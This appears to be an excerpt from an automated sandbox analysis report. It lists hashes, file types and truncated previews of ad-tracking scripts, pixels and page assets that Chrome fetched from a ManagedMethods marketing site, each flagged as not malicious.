                                                                                                                                                                                                                                                                                                                                                                          SHA1:0616A2490A830D78937A0475BFFEFF6FDC8A786C
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:203987FF8BD021893A06303E163EEB294647081D8376B725BDACBC414CC4D035
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:B4981D6A7CA55E6258CF1246226FC1F51CD9159B3610823872F880B8542B75BDFEC7161B4280B5B208ADAF15E013AFBB36574D82FE608ABF14EE7637372EBFBA
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://s.adroll.com/j/sendrolling.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){function q(a,c){for(a=a.parentElement;a;a=a.parentElement)if(c(a))return a;return null}function v(a){for(var c=[],b=a.parentNode.children,e=0;e<b.length;e++)b[e]!==a&&b[e].tagName&&"label"===b[e].tagName.toLowerCase()&&c.push(b[e].textContent);return c.join(" ")}function w(a,c,b){if(q(a,function(a){return a.id&&a.id.toLowerCase&&-1!==a.id.toLowerCase().indexOf("privy")})||a.id&&a.id.toLowerCase&&-1!==a.id.toLowerCase().indexOf("_adrollpoproll"))return!1;var e=x(a);return e?(window.__adroll_idem0(e,.c,a,b),!0):!1}function r(a){if("form"===a.target.tagName.toLowerCase()){a=a.target.getElementsByTagName("input");for(var c=0;c<a.length;c++)w(a[c],"submit")}}function x(a){if(!a.value||8>a.value.length)return null;if("input"!==a.tagName.toLowerCase()||-1!=="button checkbox color date datetime datetime-local file hidden image month number password radio range reset submit tel time week".split(" ").indexOf(a.type.toLowerCase()))return null;for(var c=["id","name","type"],b=0;b<c.len
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 32 x 32
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):4178
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.490050296203736
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:32e4MxZKDtivGOFkoajWKOwD2s4UYX034Hk4zHdwt4zeoAF5oM4JTp3uVj4gBFyj:32e4ZtyiqsdWAXWwXPF5oMcdUjVsmuS
                                                                                                                                                                                                                                                                                                                                                                          MD5:C5CD7F5300576AB4C88202B42F6DED62
                                                                                                                                                                                                                                                                                                                                                                          SHA1:7A1AA43614396382BB15E5FDE574D9CDCD21698F
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:E7B44C86B050FCA766A96DDAC2D0932AF0126DA6F2305280342D909168DCCE6B
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:F0D7ADA22A3EB3B2758198A71472FB240C74CE4CA09028076E23690C70B2339C6B2A40F9158DD71C52D953EF27BBCC0105B061BDC74FBB0AD0B304C7C6A04A38
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:GIF89a . .........................~~~................................>>>VVV```|||......JJJlll...............,,,^^^...LLL.................................................................................!..Created with ajaxload.info.!.......!..NETSCAPE2.0.....,.... . ....@.pH$.8.Gq.$N..A.3(..L....V....K|P(...:.(..r.B.._@X!/...BxBnb}E.g....o.r..E.g..^..oWD.c.....JC.g......oqm.o..........E.....{p~....r...D....}.M....d......K......r.........o....|........].q...` 9C.f).$'.=..}.C.^.u..-.H..!.............O.K"1......5.&{j.T. .BBo..e...6..<...@.B?..1..)..G.b.K... .!.......,.... . ....@.pH$&4.Bq.$..D..b(.......V....[4.._..:.t:"r.qh@..a..)..g.Bk_.o..E.g~.....#r.JD.g.xl.oWF.C....~mg......o.D.....B.....w...K.!.......C........wE... ..d....X.............r................s'...xM.&T$$..|M...C.... .A...Bl..d....K.d.V..?oFl-X. .L[.J*....6..!."...5\@....p..oI..m...N!Q.Xm..@..%2u:uH2.\.R.#.a..!.......,.... . ....@.pH$...Bq.$&.D...(..L....V....[$.....:4P(.r.s..._...I..g.BxB.o..E g.w^
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                          MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                          SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4182)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):4183
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.600886371626987
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:dwIQiT4udZLMrCrWf3DD05cNaN5rpMQDgcW3QxvPdBmAOt0RznhyDBqPh81wEasv:5cudZUCM3DssOv+OZhCQAqvEDMrQv
                                                                                                                                                                                                                                                                                                                                                                          MD5:914BB22428E0C51D8AA70B4E8EE31DA0
                                                                                                                                                                                                                                                                                                                                                                          SHA1:36AA8446A4857B47E54FDD7635FB9E8552E51A4C
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:CFAC6379159622C5669DF9729C10CD6A801886AD458533283D9E19BA84107EBE
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:AEF7F94FD560B8F7AEE7797F98582C7D46F94C2D20F965AEA67CC1F4F432A1CE94A037271EBA78379024E526A0889651ABA5ABBC5C3DD864BB3BB932BD750448
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://cdn.jsdelivr.net/gh/igniel/blogger@master/iglo/v2.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('F a=["\\h\\o\\j\\e\\l\\d","\\o\\j\\b\\g\\d\\b\\1q\\c\\b\\r\\b\\k\\d","\\d\\A\\l\\b","\\d\\b\\C\\d\\n\\I\\g\\K\\g\\h\\o\\j\\e\\l\\d","\\h\\j\\o","\\s\\d\\d\\l\\h\\1o\\n\\n\\g\\I\\g\\C\\q\\i\\f\\f\\i\\c\\b\\g\\l\\e\\h\\q\\o\\f\\r\\n\\g\\I\\g\\C\\n\\c\\e\\u\\h\\n\\I\\1j\\B\\b\\j\\A\\n\\Z\\q\\Z\\q\\1i\\n\\I\\1j\\B\\b\\j\\A\\q\\r\\e\\k\\q\\I\\h","\\g\\h\\A\\k\\o","\\f\\k\\c\\f\\g\\m","\\w\\y\\f\\f\\d\\b\\j\\x\\1p\\X\\V\\1R\\v\\T\\b\\r\\l\\c\\g\\d\\b\\v\\u\\A\\v\\e\\i\\k\\e\\b\\c\\q\\o\\f\\r\\w\\n\\y\\f\\f\\d\\b\\j\\x","\\g\\l\\l\\b\\k\\m","\\u\\f\\m\\A","\\e\\k\\y\\e\\k\\e\\d\\b\\1U\\h\\o\\j\\f\\c\\c","\\s\\d\\d\\l\\h\\1o\\n\\n\\1t\\q\\u\\l\\q\\u\\c\\f\\i\\h\\l\\f\\d
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2586)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):22537
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.532860985165806
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:4qEMQl6FtO53n+8svyf53Fo5oeHvVFBIuwRatEDTJi/EDdBC6ZcuLI4Xhw/XgsB6:4qEMQlwOFn+DCFoeeFqYt2TJisnC6ZcU
                                                                                                                                                                                                                                                                                                                                                                          MD5:38D4F310E650C3877EB2E2C55860F77B
                                                                                                                                                                                                                                                                                                                                                                          SHA1:41D2F4BD61DF909B531BF54EC54AB66CFC8712CC
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:C6F4951F54B1F8F2F57A668518D6EBC3D94ABF1A1A1ACA440DE486B13D02D85D
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:037D0A44AD44D3934029F40997165FB3F690D0C5804BF8EFBD1DC4928258A963D6F7B60D761C17E1BFE581EEEF9C58C58C6E85BF983E4203165F61939FBEE440
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){'use strict';var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ca=ba(this); .function da(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}}da("Symbol.dispose",function(a){return a?a:Symbol("Symbol.dispose")});/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var n=this||self;function ea(a,b,c){return a.call.apply(a.bind,arguments)}function p(a,b,c){p=ea;return p.apply(null,arguments)}function fa(a,b){function c(){}c.pr
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):95
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.347811435468635
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/Y3WlED//jp:6v/lhPfkCDtmywFghu3WlEDTp
                                                                                                                                                                                                                                                                                                                                                                          MD5:71A50DBBA44C78128B221B7DF7BB51F1
                                                                                                                                                                                                                                                                                                                                                                          SHA1:0EC63B140374BA704A58FA0C743CB357683313DD
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:3EB10792D1F0C7E07E7248273540F1952D9A5A2996F4B5DF70AB026CD9F05517
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:6AD523F5B65487369D305613366B9F68DCDEEE225291766E3B25FAF45439CA069F614030C08CA54C714FDBF7A944FAC489B1515A8BF9E0D3191E1BCBBFE6A9DF
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://pixel.tapad.com/idsync/ex/receive?partner_id=APPNEXUS&partner_device_id=4305931231207897773&pt=e3913225-94b4-4b08-9fd3-4285fd980084%2C%2C
                                                                                                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (41169)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):41172
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.505998162296305
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:j21xCdwV69Odf9dk1fV8iWUwcb9x8cvgBhpU9yC8IEVDlbth3Ia8DdEN:iP3kr8V8vShi98Iiph3IbC
                                                                                                                                                                                                                                                                                                                                                                          MD5:0AA5002702487976D570A640C408EBA5
                                                                                                                                                                                                                                                                                                                                                                          SHA1:48930F22A2396DF313CCDFCB91CAC20E38F2B06B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:4E8276AEA0A3C7FE3600E6718C7F484D49C347C8D5763D89BE95900D526A14DA
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:37A9D609DB21EE1E696CB437C02F0F6410925EB10B6353C0CDF95DB265E342F0BC3D2AE1851D209E4517D978B7CCBE8AD56F98247FA865AE405FAFD4D2E62CDA
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://snap.licdn.com/li.lms-analytics/insight.min.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:!function(){"use strict";function n(n,t,e){return t in n?Object.defineProperty(n,t,{value:e,enumerable:!0,configurable:!0,writable:!0}):n[t]=e,n}var t,e,r,i,o={ADVERTISING:"ADVERTISING",ANALYTICS_AND_RESEARCH:"ANALYTICS_AND_RESEARCH",FUNCTIONAL:"FUNCTIONAL"},a="GUEST",u="MEMBER",c=0,l=1,d=2,s=(n(t={},a,"li_gc"),n(t,u,"li_mc"),t),f=function vr(){var n=arguments.length>0&&arguments[0]!==undefined?arguments[0]:null,t=arguments.length>1&&arguments[1]!==undefined?arguments[1]:null,e=arguments.length>2&&arguments[2]!==undefined?arguments[2]:null,r=arguments.length>3&&arguments[3]!==undefined?arguments[3]:null;for(var i in function(n,t){if(!(n instanceof t))throw new TypeError("Cannot call a class as a function")}(this,vr),n=n||{},this.consentAvailable=!1,this.issuedAt=t,this.userMode=e,this.optedInConsentMap={},o)n[i]=n[i]||c,n[i]!==c&&(this.consentAvailable=!0),this.optedInConsentMap[i]=n[i]===l||n[i]===c&&r===l},v=(e=[o.ADVERTISING,o.ANALYTICS_AND_RESEARCH,o.FUNCTIONAL],r=[c,l,d,c],i=new R
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (712)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):3626
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.371235721791758
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:yM/7rUHUjU0WmkrALd6Ln6kOM/Ou4nMrMYXxCAfKslFyhwzw+xA5Lj98P8Rh7PN9:qHUjU0WlU8aAvk20+xAJdVJzX
                                                                                                                                                                                                                                                                                                                                                                          MD5:3CC67A5F12A1DA86A9760CB3854EE5D4
                                                                                                                                                                                                                                                                                                                                                                          SHA1:EA3845E1ED39855EF0E589BC3E5E74800D674860
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:27343EC4E1944D5B6145116EAEB711099464A96E0643EBB4A1CB5C9496548AFC
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:F9870F37AFCA3F47CC62C32F07B8C60B218A370E9A9BF036717F1F10302F98689C3B43C2FBC753748EFE85B9F652ABE69E7BB28D2C127ABCF16342AC0763436E
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://s.adroll.com/pixel/TSSSGOL6MBFETCAHMJBJCQ/I63T2M6SPVC5ROYHA7HR6W/J5ZZRODTFVDKLJ2GKXKSSA.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function () {. var scheme = (("https:" == document.location.protocol) ? "https" : "http");. var adnxs_domain = 'secure.adnxs.com';. var aol_domain = 'secure.leadback.advertising.com';. window.adroll_seg_eid = "J5ZZRODTFVDKLJ2GKXKSSA";. window.adroll_sendrolling_cross_device = true;. window.adroll_form_fields = {};. window.adroll_third_party_forms = {};. window.adroll_third_party_detected = {};. window.adroll_snippet_errors = [];. if (typeof __adroll._form_attach != 'undefined') {. __adroll._form_attach();. }. if (typeof __adroll._form_tp_attach != 'undefined') {. __adroll._form_tp_attach();. }. window.adroll_rule_type = "s";. var rule = ["87322457", "*get.managedmethods.com*"];. if (scheme=='http') { adnxs_domain = 'ib.adnxs.com'; aol_domain = 'leadback.advertising.com';}. var el = document.createElement("div");. el.style["width"] = "1px";. el.style["height"] = "1px";. el.style["display"] = "inline";. el.style["position"] = "absolute";. var content = '';..
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):13
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.7773627950641693
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                                                                                                                                                                                                          MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                                                                                                                                                                                                          SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://td.doubleclick.net/td/rul/927141988?random=1728897184905&cv=11&fst=1728897184905&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4a90v873384026za200zb810608771&gcd=13r3r3r3r5l1&dma=0&tag_exp=101671035~101686685&u_w=1280&u_h=1024&url=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&ref=https%3A%2F%2Fgoogleads.g.doubleclick.net%2F&hn=www.googleadservices.com&frm=0&tiba=Automating%20Cybersecurity%20%26%20Student%20Safety%20with%20ManagedMethods&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=199392175.1728897184&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
                                                                                                                                                                                                                                                                                                                                                                          Preview:<html></html>
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:V:V
                                                                                                                                                                                                                                                                                                                                                                          MD5:E0AA021E21DDDBD6D8CECEC71E9CF564
                                                                                                                                                                                                                                                                                                                                                                          SHA1:9CE3BD4224C8C1780DB56B4125ECF3F24BF748B7
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:565339BC4D33D72817B583024112EB7F5CDF3E5EEF0252D6EC1B9C9A94E12BB3
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:900110C951560EFF857B440E89CC29F529416E0E3B3D7F0AD51651BFDBD8025B91768C5ED7DB5352D1A5523354CE06CED2C42047E33A3E958A1BBA5F742DB874
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://x.adroll.com/attribution/trigger?fpc=378484b1f0e790975382e6fc128c23d2&advertisable_eid=TSSSGOL6MBFETCAHMJBJCQ&conversion_type=PageView&conversion_value=0.00&currency=USC&flg=1&pv=55268102626.38289&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fcloud-application-security-checklist
                                                                                                                                                                                                                                                                                                                                                                          Preview:OK
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (41169)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):41172
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.505998162296305
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:j21xCdwV69Odf9dk1fV8iWUwcb9x8cvgBhpU9yC8IEVDlbth3Ia8DdEN:iP3kr8V8vShi98Iiph3IbC
                                                                                                                                                                                                                                                                                                                                                                          MD5:0AA5002702487976D570A640C408EBA5
                                                                                                                                                                                                                                                                                                                                                                          SHA1:48930F22A2396DF313CCDFCB91CAC20E38F2B06B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:4E8276AEA0A3C7FE3600E6718C7F484D49C347C8D5763D89BE95900D526A14DA
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:37A9D609DB21EE1E696CB437C02F0F6410925EB10B6353C0CDF95DB265E342F0BC3D2AE1851D209E4517D978B7CCBE8AD56F98247FA865AE405FAFD4D2E62CDA
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:!function(){"use strict";function n(n,t,e){return t in n?Object.defineProperty(n,t,{value:e,enumerable:!0,configurable:!0,writable:!0}):n[t]=e,n}var t,e,r,i,o={ADVERTISING:"ADVERTISING",ANALYTICS_AND_RESEARCH:"ANALYTICS_AND_RESEARCH",FUNCTIONAL:"FUNCTIONAL"},a="GUEST",u="MEMBER",c=0,l=1,d=2,s=(n(t={},a,"li_gc"),n(t,u,"li_mc"),t),f=function vr(){var n=arguments.length>0&&arguments[0]!==undefined?arguments[0]:null,t=arguments.length>1&&arguments[1]!==undefined?arguments[1]:null,e=arguments.length>2&&arguments[2]!==undefined?arguments[2]:null,r=arguments.length>3&&arguments[3]!==undefined?arguments[3]:null;for(var i in function(n,t){if(!(n instanceof t))throw new TypeError("Cannot call a class as a function")}(this,vr),n=n||{},this.consentAvailable=!1,this.issuedAt=t,this.userMode=e,this.optedInConsentMap={},o)n[i]=n[i]||c,n[i]!==c&&(this.consentAvailable=!0),this.optedInConsentMap[i]=n[i]===l||n[i]===c&&r===l},v=(e=[o.ADVERTISING,o.ANALYTICS_AND_RESEARCH,o.FUNCTIONAL],r=[c,l,d,c],i=new R
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65327)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):70475
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.380996746038723
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:ZKblURHpp4V2JLxcbvM/9mU7C7Az6v0j861:ZmlgJpEvM/9D9z6cI61
                                                                                                                                                                                                                                                                                                                                                                          MD5:48BB5C8A01043ECEAF45E65D5C98950B
                                                                                                                                                                                                                                                                                                                                                                          SHA1:4603360883DD66F7254CD5DB17777748226DC657
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:77080938572095BDDC311784E1C284E7CD12268F46946AFF94D04A43A53DFFC9
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:3A03DD060953E790E8ECB40DBE64F2CE4980DAE93433209C40C56910231663660306FE5FCD3D8D3041CC2BAECACA1E3DB1E5C27C39B1A23381D633CA432992DD
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://js.hscollectedforms.net/collectedforms.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:/*! For license information please see project.js.LICENSE.txt */.!function(){"use strict";var t={}.toString,e=function(e){return t.call(e).slice(8,-1)},r=Array.isArray||function(t){return"Array"==e(t)},n=function(t){return"object"==typeof t?null!==t:"function"==typeof t},i=function(t){if(null==t)throw TypeError("Can't call method on "+t);return t},o=function(t){return Object(i(t))},s=Math.ceil,a=Math.floor,u=function(t){return isNaN(t=+t)?0:(t>0?a:s)(t)},c=Math.min,l=function(t){return t>0?c(u(t),9007199254740991):0},f=function(t,e){if(!n(t))return t;var r,i;if(e&&"function"==typeof(r=t.toString)&&!n(i=r.call(t)))return i;if("function"==typeof(r=t.valueOf)&&!n(i=r.call(t)))return i;if(!e&&"function"==typeof(r=t.toString)&&!n(i=r.call(t)))return i;throw TypeError("Can't convert object to primitive value")},d=function(t){try{return!!t()}catch(t){return!0}},h=!d((function(){return 7!=Object.defineProperty({},"a",{get:function(){return 7}}).a})),p="object"==typeof window&&window&&window.Ma
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (39722)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):105865
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.178300653441378
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:S/V8NwtxekZDPbwU11AkkoD23fyB54r0ei0WTuiX:RqTekZHwU11AkkoD23fyB54r0ei0WTR
                                                                                                                                                                                                                                                                                                                                                                          MD5:DA77001254670E6389AFCC90947A8260
                                                                                                                                                                                                                                                                                                                                                                          SHA1:8170539B15A531174C4419F02D39DE82F012EDCE
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:1B79775974F339C0FFC9CD927A78197CDFC71B5D481542A6845055A91CA6DE0B
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:3E87E191E620475ED1193B23864DBB0E6E399180FE2499C187F7D24DC24D433CE56E92AD39A7591A82128608FBFFF62EA5AA728B51351777698B6DAAB579665A
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://get.managedmethods.com/hs-fs/hub/6834707/hub_generated/template_assets/175647721775/1728330106102/Marketplace/Inbound_Pixels/Inspire/Coded_Files/inspire_hero_2024_redesign.min.css
